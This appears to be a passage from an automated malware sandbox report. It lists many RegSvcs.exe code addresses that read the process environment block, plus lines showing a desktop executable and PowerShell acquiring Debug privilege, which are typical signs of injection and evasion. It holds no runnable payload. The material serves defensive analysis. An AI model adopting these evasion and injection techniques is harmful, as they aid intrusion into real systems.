Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0192260B mov eax, dword ptr fs:[00000030h]	9_2_0192260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0192260B mov eax, dword ptr fs:[00000030h]	9_2_0192260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0192260B mov eax, dword ptr fs:[00000030h]	9_2_0192260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0192260B mov eax, dword ptr fs:[00000030h]	9_2_0192260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0192260B mov eax, dword ptr fs:[00000030h]	9_2_0192260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0192260B mov eax, dword ptr fs:[00000030h]	9_2_0192260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0192260B mov eax, dword ptr fs:[00000030h]	9_2_0192260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01946620 mov eax, dword ptr fs:[00000030h]	9_2_01946620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01948620 mov eax, dword ptr fs:[00000030h]	9_2_01948620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0192E627 mov eax, dword ptr fs:[00000030h]	9_2_0192E627
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0191262C mov eax, dword ptr fs:[00000030h]	9_2_0191262C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0192C640 mov eax, dword ptr fs:[00000030h]	9_2_0192C640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01942674 mov eax, dword ptr fs:[00000030h]	9_2_01942674
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D866E mov eax, dword ptr fs:[00000030h]	9_2_019D866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D866E mov eax, dword ptr fs:[00000030h]	9_2_019D866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0194A660 mov eax, dword ptr fs:[00000030h]	9_2_0194A660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0194A660 mov eax, dword ptr fs:[00000030h]	9_2_0194A660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019989B3 mov esi, dword ptr fs:[00000030h]	9_2_019989B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019989B3 mov eax, dword ptr fs:[00000030h]	9_2_019989B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019989B3 mov eax, dword ptr fs:[00000030h]	9_2_019989B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019229A0 mov eax, dword ptr fs:[00000030h]	9_2_019229A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019229A0 mov eax, dword ptr fs:[00000030h]	9_2_019229A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019229A0 mov eax, dword ptr fs:[00000030h]	9_2_019229A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019229A0 mov eax, dword ptr fs:[00000030h]	9_2_019229A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019229A0 mov eax, dword ptr fs:[00000030h]	9_2_019229A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019229A0 mov eax, dword ptr fs:[00000030h]	9_2_019229A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019229A0 mov eax, dword ptr fs:[00000030h]	9_2_019229A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019229A0 mov eax, dword ptr fs:[00000030h]	9_2_019229A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019229A0 mov eax, dword ptr fs:[00000030h]	9_2_019229A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019229A0 mov eax, dword ptr fs:[00000030h]	9_2_019229A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019229A0 mov eax, dword ptr fs:[00000030h]	9_2_019229A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019229A0 mov eax, dword ptr fs:[00000030h]	9_2_019229A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019229A0 mov eax, dword ptr fs:[00000030h]	9_2_019229A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019109AD mov eax, dword ptr fs:[00000030h]	9_2_019109AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019109AD mov eax, dword ptr fs:[00000030h]	9_2_019109AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0191A9D0 mov eax, dword ptr fs:[00000030h]	9_2_0191A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0191A9D0 mov eax, dword ptr fs:[00000030h]	9_2_0191A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0191A9D0 mov eax, dword ptr fs:[00000030h]	9_2_0191A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0191A9D0 mov eax, dword ptr fs:[00000030h]	9_2_0191A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0191A9D0 mov eax, dword ptr fs:[00000030h]	9_2_0191A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0191A9D0 mov eax, dword ptr fs:[00000030h]	9_2_0191A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019449D0 mov eax, dword ptr fs:[00000030h]	9_2_019449D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019DA9D3 mov eax, dword ptr fs:[00000030h]	9_2_019DA9D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A69C0 mov eax, dword ptr fs:[00000030h]	9_2_019A69C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019429F9 mov eax, dword ptr fs:[00000030h]	9_2_019429F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019429F9 mov eax, dword ptr fs:[00000030h]	9_2_019429F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0199E9E0 mov eax, dword ptr fs:[00000030h]	9_2_0199E9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01908918 mov eax, dword ptr fs:[00000030h]	9_2_01908918
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01908918 mov eax, dword ptr fs:[00000030h]	9_2_01908918
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0199C912 mov eax, dword ptr fs:[00000030h]	9_2_0199C912
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0198E908 mov eax, dword ptr fs:[00000030h]	9_2_0198E908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0198E908 mov eax, dword ptr fs:[00000030h]	9_2_0198E908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A892B mov eax, dword ptr fs:[00000030h]	9_2_019A892B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0199892A mov eax, dword ptr fs:[00000030h]	9_2_0199892A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01990946 mov eax, dword ptr fs:[00000030h]	9_2_01990946
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019B4978 mov eax, dword ptr fs:[00000030h]	9_2_019B4978
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019B4978 mov eax, dword ptr fs:[00000030h]	9_2_019B4978
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0199C97C mov eax, dword ptr fs:[00000030h]	9_2_0199C97C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01936962 mov eax, dword ptr fs:[00000030h]	9_2_01936962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01936962 mov eax, dword ptr fs:[00000030h]	9_2_01936962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01936962 mov eax, dword ptr fs:[00000030h]	9_2_01936962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0195096E mov eax, dword ptr fs:[00000030h]	9_2_0195096E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0195096E mov edx, dword ptr fs:[00000030h]	9_2_0195096E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0195096E mov eax, dword ptr fs:[00000030h]	9_2_0195096E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0199C89D mov eax, dword ptr fs:[00000030h]	9_2_0199C89D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01910887 mov eax, dword ptr fs:[00000030h]	9_2_01910887
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0193E8C0 mov eax, dword ptr fs:[00000030h]	9_2_0193E8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0194C8F9 mov eax, dword ptr fs:[00000030h]	9_2_0194C8F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0194C8F9 mov eax, dword ptr fs:[00000030h]	9_2_0194C8F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019DA8E4 mov eax, dword ptr fs:[00000030h]	9_2_019DA8E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0199C810 mov eax, dword ptr fs:[00000030h]	9_2_0199C810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019B483A mov eax, dword ptr fs:[00000030h]	9_2_019B483A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019B483A mov eax, dword ptr fs:[00000030h]	9_2_019B483A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0194A830 mov eax, dword ptr fs:[00000030h]	9_2_0194A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01932835 mov eax, dword ptr fs:[00000030h]	9_2_01932835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01932835 mov eax, dword ptr fs:[00000030h]	9_2_01932835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01932835 mov eax, dword ptr fs:[00000030h]	9_2_01932835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01932835 mov ecx, dword ptr fs:[00000030h]	9_2_01932835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01932835 mov eax, dword ptr fs:[00000030h]	9_2_01932835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01932835 mov eax, dword ptr fs:[00000030h]	9_2_01932835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01940854 mov eax, dword ptr fs:[00000030h]	9_2_01940854
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01914859 mov eax, dword ptr fs:[00000030h]	9_2_01914859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01914859 mov eax, dword ptr fs:[00000030h]	9_2_01914859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01922840 mov ecx, dword ptr fs:[00000030h]	9_2_01922840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A6870 mov eax, dword ptr fs:[00000030h]	9_2_019A6870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A6870 mov eax, dword ptr fs:[00000030h]	9_2_019A6870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0199E872 mov eax, dword ptr fs:[00000030h]	9_2_0199E872
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0199E872 mov eax, dword ptr fs:[00000030h]	9_2_0199E872
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01920BBE mov eax, dword ptr fs:[00000030h]	9_2_01920BBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01920BBE mov eax, dword ptr fs:[00000030h]	9_2_01920BBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019C4BB0 mov eax, dword ptr fs:[00000030h]	9_2_019C4BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019C4BB0 mov eax, dword ptr fs:[00000030h]	9_2_019C4BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019BEBD0 mov eax, dword ptr fs:[00000030h]	9_2_019BEBD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01930BCB mov eax, dword ptr fs:[00000030h]	9_2_01930BCB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01930BCB mov eax, dword ptr fs:[00000030h]	9_2_01930BCB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01930BCB mov eax, dword ptr fs:[00000030h]	9_2_01930BCB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01910BCD mov eax, dword ptr fs:[00000030h]	9_2_01910BCD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01910BCD mov eax, dword ptr fs:[00000030h]	9_2_01910BCD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01910BCD mov eax, dword ptr fs:[00000030h]	9_2_01910BCD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01918BF0 mov eax, dword ptr fs:[00000030h]	9_2_01918BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01918BF0 mov eax, dword ptr fs:[00000030h]	9_2_01918BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01918BF0 mov eax, dword ptr fs:[00000030h]	9_2_01918BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0199CBF0 mov eax, dword ptr fs:[00000030h]	9_2_0199CBF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0193EBFC mov eax, dword ptr fs:[00000030h]	9_2_0193EBFC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0198EB1D mov eax, dword ptr fs:[00000030h]	9_2_0198EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0198EB1D mov eax, dword ptr fs:[00000030h]	9_2_0198EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0198EB1D mov eax, dword ptr fs:[00000030h]	9_2_0198EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0198EB1D mov eax, dword ptr fs:[00000030h]	9_2_0198EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0198EB1D mov eax, dword ptr fs:[00000030h]	9_2_0198EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0198EB1D mov eax, dword ptr fs:[00000030h]	9_2_0198EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0198EB1D mov eax, dword ptr fs:[00000030h]	9_2_0198EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0198EB1D mov eax, dword ptr fs:[00000030h]	9_2_0198EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0198EB1D mov eax, dword ptr fs:[00000030h]	9_2_0198EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0193EB20 mov eax, dword ptr fs:[00000030h]	9_2_0193EB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0193EB20 mov eax, dword ptr fs:[00000030h]	9_2_0193EB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D8B28 mov eax, dword ptr fs:[00000030h]	9_2_019D8B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D8B28 mov eax, dword ptr fs:[00000030h]	9_2_019D8B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019BEB50 mov eax, dword ptr fs:[00000030h]	9_2_019BEB50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019C4B4B mov eax, dword ptr fs:[00000030h]	9_2_019C4B4B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019C4B4B mov eax, dword ptr fs:[00000030h]	9_2_019C4B4B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019B8B42 mov eax, dword ptr fs:[00000030h]	9_2_019B8B42
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A6B40 mov eax, dword ptr fs:[00000030h]	9_2_019A6B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A6B40 mov eax, dword ptr fs:[00000030h]	9_2_019A6B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019DAB40 mov eax, dword ptr fs:[00000030h]	9_2_019DAB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0190CB7E mov eax, dword ptr fs:[00000030h]	9_2_0190CB7E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01948A90 mov edx, dword ptr fs:[00000030h]	9_2_01948A90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0191EA80 mov eax, dword ptr fs:[00000030h]	9_2_0191EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0191EA80 mov eax, dword ptr fs:[00000030h]	9_2_0191EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0191EA80 mov eax, dword ptr fs:[00000030h]	9_2_0191EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0191EA80 mov eax, dword ptr fs:[00000030h]	9_2_0191EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0191EA80 mov eax, dword ptr fs:[00000030h]	9_2_0191EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0191EA80 mov eax, dword ptr fs:[00000030h]	9_2_0191EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0191EA80 mov eax, dword ptr fs:[00000030h]	9_2_0191EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0191EA80 mov eax, dword ptr fs:[00000030h]	9_2_0191EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0191EA80 mov eax, dword ptr fs:[00000030h]	9_2_0191EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019E4A80 mov eax, dword ptr fs:[00000030h]	9_2_019E4A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01918AA0 mov eax, dword ptr fs:[00000030h]	9_2_01918AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01918AA0 mov eax, dword ptr fs:[00000030h]	9_2_01918AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01966AA4 mov eax, dword ptr fs:[00000030h]	9_2_01966AA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01910AD0 mov eax, dword ptr fs:[00000030h]	9_2_01910AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01944AD0 mov eax, dword ptr fs:[00000030h]	9_2_01944AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01944AD0 mov eax, dword ptr fs:[00000030h]	9_2_01944AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01966ACC mov eax, dword ptr fs:[00000030h]	9_2_01966ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01966ACC mov eax, dword ptr fs:[00000030h]	9_2_01966ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01966ACC mov eax, dword ptr fs:[00000030h]	9_2_01966ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0194AAEE mov eax, dword ptr fs:[00000030h]	9_2_0194AAEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0194AAEE mov eax, dword ptr fs:[00000030h]	9_2_0194AAEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0199CA11 mov eax, dword ptr fs:[00000030h]	9_2_0199CA11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01934A35 mov eax, dword ptr fs:[00000030h]	9_2_01934A35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01934A35 mov eax, dword ptr fs:[00000030h]	9_2_01934A35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0194CA38 mov eax, dword ptr fs:[00000030h]	9_2_0194CA38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0194CA24 mov eax, dword ptr fs:[00000030h]	9_2_0194CA24
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0193EA2E mov eax, dword ptr fs:[00000030h]	9_2_0193EA2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01916A50 mov eax, dword ptr fs:[00000030h]	9_2_01916A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01916A50 mov eax, dword ptr fs:[00000030h]	9_2_01916A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01916A50 mov eax, dword ptr fs:[00000030h]	9_2_01916A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01916A50 mov eax, dword ptr fs:[00000030h]	9_2_01916A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01916A50 mov eax, dword ptr fs:[00000030h]	9_2_01916A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01916A50 mov eax, dword ptr fs:[00000030h]	9_2_01916A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01916A50 mov eax, dword ptr fs:[00000030h]	9_2_01916A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01920A5B mov eax, dword ptr fs:[00000030h]	9_2_01920A5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01920A5B mov eax, dword ptr fs:[00000030h]	9_2_01920A5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0198CA72 mov eax, dword ptr fs:[00000030h]	9_2_0198CA72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0198CA72 mov eax, dword ptr fs:[00000030h]	9_2_0198CA72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0194CA6F mov eax, dword ptr fs:[00000030h]	9_2_0194CA6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0194CA6F mov eax, dword ptr fs:[00000030h]	9_2_0194CA6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0194CA6F mov eax, dword ptr fs:[00000030h]	9_2_0194CA6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019BEA60 mov eax, dword ptr fs:[00000030h]	9_2_019BEA60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0194CDB1 mov ecx, dword ptr fs:[00000030h]	9_2_0194CDB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0194CDB1 mov eax, dword ptr fs:[00000030h]	9_2_0194CDB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0194CDB1 mov eax, dword ptr fs:[00000030h]	9_2_0194CDB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01938DBF mov eax, dword ptr fs:[00000030h]	9_2_01938DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01938DBF mov eax, dword ptr fs:[00000030h]	9_2_01938DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D8DAE mov eax, dword ptr fs:[00000030h]	9_2_019D8DAE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D8DAE mov eax, dword ptr fs:[00000030h]	9_2_019D8DAE

Source: C:\Users\user\Desktop\890983726372673.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe

